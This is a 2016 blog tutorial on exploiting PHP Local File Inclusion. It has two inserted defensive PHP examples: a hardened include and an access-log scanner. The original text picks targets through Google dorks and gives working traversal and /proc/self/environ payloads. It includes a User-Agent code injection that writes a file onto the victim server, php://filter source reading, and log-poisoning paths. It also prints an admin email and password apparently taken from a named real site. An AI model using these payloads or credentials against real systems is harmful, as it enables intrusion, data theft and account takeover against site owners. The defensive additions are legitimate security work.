Friday, April 15, 2016

LFI (Local File Inclusion) 100% noob [BASIC]

!! FOR EDUCATIONAL PURPOSES ONLY !!

I Introduction
Hey guys, today I'm going to teach you LFI (Local File Inclusion).

II Learning Basics
First, let's learn some basics.

1) Google Dorks
What are Google dorks?
Google dorks are search operators such as "inurl" and "intext" that narrow a Google search down to pages with a given URL pattern or page text.

Why do we need them?
No, we don't need them. Just kidding, of course we need them to find target websites!

How do we use them?
For example, go to Google and search: " inurl:index.php?page=news.php "
You'll see results like www.website.com/index.php?page=news.php

So what's next?

2) LFI
Local File Inclusion is the process of including files that are already present locally on the server, by exploiting vulnerable inclusion routines implemented in the application (typically an include() whose argument is built from a request parameter).
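To make the definition concrete, here is the include pattern that makes a "index.php?page=..." parameter exploitable, next to a hardened version. This is an added example and not code from the original post; the allowlist keys, the pages/ directory and the temp-dir layout are assumptions for the demo.

```php
<?php
// Added example, not code from the original post: the include pattern that
// makes "index.php?page=..." exploitable, next to a hardened version.
// Directory and page names below are assumptions for the demo.

// VULNERABLE: the raw query value goes straight into include(), so
// "../../../etc/passwd", "../../../proc/self/environ" and "php://filter/..."
// are all accepted exactly as sent.
function vulnerable_include_target(string $page): string
{
    return $page;        // a real app would do: include($page);
}

// HARDENED: the request only selects a key in a fixed map, so the path is
// never built from user input; realpath() confines the result to $baseDir
// as a second, independent check.
const PAGES = [
    'news'    => 'pages/news.php',
    'contact' => 'pages/contact.php',
];

function safe_include_target(string $page, string $baseDir): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;                                   // unknown page: refuse
    }
    $base = realpath($baseDir);
    $full = realpath($baseDir . '/' . PAGES[$page]);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                   // missing file or outside the web root
    }
    return $full;
}

// Demo layout in a temp directory so the script runs anywhere.
$root = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
mkdir("$root/pages", 0700, true);
file_put_contents("$root/pages/news.php", "<?php echo 'news';\n");

$requests = [
    'news',
    'news.php',
    '../../../etc/passwd',
    '../../../proc/self/environ',
    'php://filter/convert.base64-encode/resource=index.php',
    'contact',                    // allowlisted, but the file does not exist
];
foreach ($requests as $page) {
    $safe = safe_include_target($page, $root);
    printf("%-55s vulnerable: %-55s hardened: %s\n",
        $page, vulnerable_include_target($page), $safe ?? 'REJECTED');
}

// Clean up the demo files.
unlink("$root/pages/news.php");
rmdir("$root/pages");
rmdir($root);
```

Run it with `php safe_include.php`. Only `news` resolves in the hardened version; every traversal, /proc and php:// value is rejected before any path is touched, and `contact` shows the fail-closed behaviour when an allowlisted file is missing.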

IV Getting backdoor using LFI
First, we will try to read /etc/passwd to check whether the parameter is vulnerable to directory traversal.
../ is used to go up into the parent directory.

www.website.com/index.php?page=/etc/passwd
www.website.com/index.php?page=../etc/passwd
www.website.com/index.php?page=../../etc/passwd
www.website.com/index.php?page=../../../etc/passwd (Worked!)

Next, we will now try to include /proc/self/environ in order to execute PHP code.
www.website.com/index.php?page=../../../proc/self/environ (Worked!)

To check if it works, you should see something like this:
DOCUMENT_ROOT=/home/www/public_htmlGATEWAY_INTERFACE=CGI/1.1HTTP_ACCEPT=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8HTTP_ACCEPT_ENCODING=gzip, deflateHTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5HTTP_CONNECTION=keep-aliveHTTP_HOST=localhostHTTP_USER_AGENT=Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:27.0) Gecko/20100101 Firefox/27.0PATH=/bin:/usr/binPHPRC=/usr/local/lib/QUERY_STRING=page=../../../../proc/self/environREDIRECT_STATUS=200REMOTE_ADDR=182.68.251.152REMOTE_PORT=21007REQUEST_METHOD=GETREQUEST_URI=/?page=../../../../proc/self/environSCRIPT_FILENAME=/home/www/public_html/index.phpSCRIPT_NAME=/index.phpSERVER_ADDR=103.28.12.130SERVER_ADMIN= _NAME=localhostSERVER_PORT=80SERVER_PROTOCOL=HTTP/1.1SERVER_SIGNATURE=SERVER_SOFTWARE=ApacheUNIQUE_ID=U@e2lmccDCgAB3SNHk0AAAA

If you see something like 'HTTP_USER_AGENT=Mozilla' then you're good to go:
the User-Agent header is reflected into the included file, so PHP code placed in it is executed when the page is requested.

a) If you're using Google Chrome it's easier, because you don't need to download any extensions/add-ons
Step 1) Press F12
Step 2) Click Toggle device mode
Step 3) Click responsive
Step 4) Click Edit
Step 5) Click "Add custom device..."
Step 6) Add any device name and we will edit the User Agent later

b) If you're using Mozilla Firefox, download Live HTTP Headers or Tamper Data

So change the User Agent to <?php phpinfo() ?>
Then, if you see the phpinfo() output, change the User-Agent to:
<?$file = fopen("shhacked.php","w");fwrite($file,"<?phpinfo()?>");fclose($file);phpinfo();?>
And now check www.website.com/shhacked.php
There you go. Well done.

V Read files using LFI
OK, let's make this quick.
php://filter is a meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents(), where there is otherwise no opportunity to apply a filter to the stream prior to the contents being read. With it we can read PHP source files such as configuration/database.php; the base64 encoding returns the file contents as text instead of having the server execute them.
USAGE: php://filter/convert.base64-encode/resource=<file name here>
for example: https://icrpv5.org/index.php?page=php://filter/convert.base64-encode/resource=includes/process_login.php

You'll see a base64-encoded string. Decode it at http://shunz19.blogspot.com/2016/04/string-tools.html

So if you decode it, you'll see "if ($email == "admin@icrpv5.org" AND $password == '2015icrpvB4L1')". Easy: the email is admin@icrpv5.org and the password is 2015icrpvB4L1

VI Tips
If you use /proc/self/environ and it doesn't load, the alternative is log poisoning.
In order to perform LFI log poisoning you need to be able to include the Apache error and/or access logs. Unfortunately this has been made "impossible" in newer versions of Apache (the most widely used web server), because the log files are no longer readable by the web server user.

Some common log files:

/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/log/apache/error_log
/var/log/apache2/error_log
/var/log/apache/error.log
/var/log/apache2/error.log
/var/log/error_log
/var/log/error.log
/var/www/logs/error_log
/var/www/logs/error.log
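Seen from the server side, every step in sections IV to VI leaves a distinctive trace in the access log: traversal sequences, /proc/self/environ, the php:// wrapper, the log paths above, and a PHP open tag in the User-Agent. The scanner below flags those requests. It is an added example and not part of the original post; the log lines are constructed for the demo and the indicator list is an assumption, not an exhaustive signature set.

```php
<?php
// Added example, not part of the original post: flag LFI-style requests in an
// Apache combined-format access log. Log lines below are constructed.

const LFI_INDICATORS = [
    'traversal'      => '~(\.\./|\.\.\\\\)~',
    'proc_environ'   => '~/proc/self/environ~i',
    'php_wrapper'    => '~\bphp://~i',
    'sensitive_path' => '~/etc/passwd|/etc/httpd/logs/|/var/log/|/var/www/logs/~i',
];
// A PHP open tag in the User-Agent is the signature of the environ / log
// poisoning step from section IV.
const UA_PHP_TAG = '~<\?(php)?~i';

// Combined log format:
// ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
const LOG_LINE = '~^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$~';

function scan_access_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        if (!preg_match(LOG_LINE, $line, $m)) {
            continue;                       // not combined format: skip it
        }
        [, $ip, $path, $status, $ua] = $m;
        // Decode twice so double-encoded traversal (%252e%252e%252f) is caught too.
        $decoded = rawurldecode(rawurldecode($path));
        $hits = [];
        foreach (LFI_INDICATORS as $name => $re) {
            if (preg_match($re, $decoded)) {
                $hits[] = $name;
            }
        }
        if (preg_match(UA_PHP_TAG, $ua)) {
            $hits[] = 'php_tag_in_user_agent';
        }
        if ($hits) {
            // A 200 here is the server-side view of the post's "(Worked!)".
            $findings[] = ['ip' => $ip, 'status' => (int) $status,
                           'path' => $decoded, 'hits' => $hits];
        }
    }
    return $findings;
}

// Constructed sample: one normal request, four of the post's techniques.
$sample = [
    '203.0.113.5 - - [15/Apr/2016:10:01:02 +0000] "GET /index.php?page=news.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Apr/2016:10:01:09 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Apr/2016:10:01:15 +0000] "GET /index.php?page=..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?php phpinfo() ?>"',
    '203.0.113.5 - - [15/Apr/2016:10:01:30 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=includes/config.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Apr/2016:10:01:41 +0000] "GET /index.php?page=../../../var/log/apache2/error.log HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Apr/2016:10:02:00 +0000] "GET /index.php?page=contact.php HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
];

foreach (scan_access_log($sample) as $f) {
    printf("%s %d %s -> %s\n", $f['ip'], $f['status'], $f['path'], implode(',', $f['hits']));
}
```

Run with `php scan_lfi.php`; the two plain page requests produce nothing, while the other four lines are reported with the indicators they matched. Alerting on an LFI indicator paired with a 200 response from a single source IP in a short window is the practical rule to build from this.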

VII Goodbye
If you have any feedback or questions, please feel free to comment! That's all for now, bye!
